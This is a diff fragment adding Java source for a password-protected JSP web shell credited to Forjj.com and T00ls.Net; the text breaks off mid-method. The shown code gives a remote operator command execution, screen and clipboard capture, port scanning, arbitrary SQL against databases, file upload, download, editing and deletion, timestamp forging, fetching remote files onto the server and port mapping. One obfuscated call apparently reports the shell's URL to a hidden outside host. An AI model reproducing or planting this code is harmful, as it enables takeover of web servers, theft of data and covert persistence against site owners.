+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
"+ +" "+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"+ +"

Remote Control »

"+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
"+ +"

PortScan >>

"+ +"
"+ +"

"+ +"IP : Port : Timeout (秒) : "+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
"); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
"); +} +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(), "GBK"); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +out.println("
"+ +"

Run SQL query/queries on database :

"); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

Query#0 : "+Util.htmlEncode(sql)+"

"); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"
"); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

affected rows : "+obj+"

"); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +"

Password: "+ +" "+ +" "+ +" "+ +"

"+ +" "+ +"Copyright © 2009 NinTy www.Forjj.com

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
"); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

"); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Current Directory
"+ +"
"); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
"+ +"
"+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
 Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
"); +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)

"+ +"

File Content

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)

"+ +"

File Content

"+ +"

"+ +"
"+ +"
"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); +out.println("
"+ +"
"+ +"

Set File Property »

"+ +"

Current file (fullpath)

"+ +" "+ +"

Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

"+ +"

Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
"+ +"
"+ +"

Execute Program »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"+ +"

Execute Shell »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
"); +out.println("
");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
"); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.forjj.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
"+ +"
"+ +"

Remote File DownLoad »

"+ +"

"+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.forjj.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

PortMap >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

"+ +" "+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) 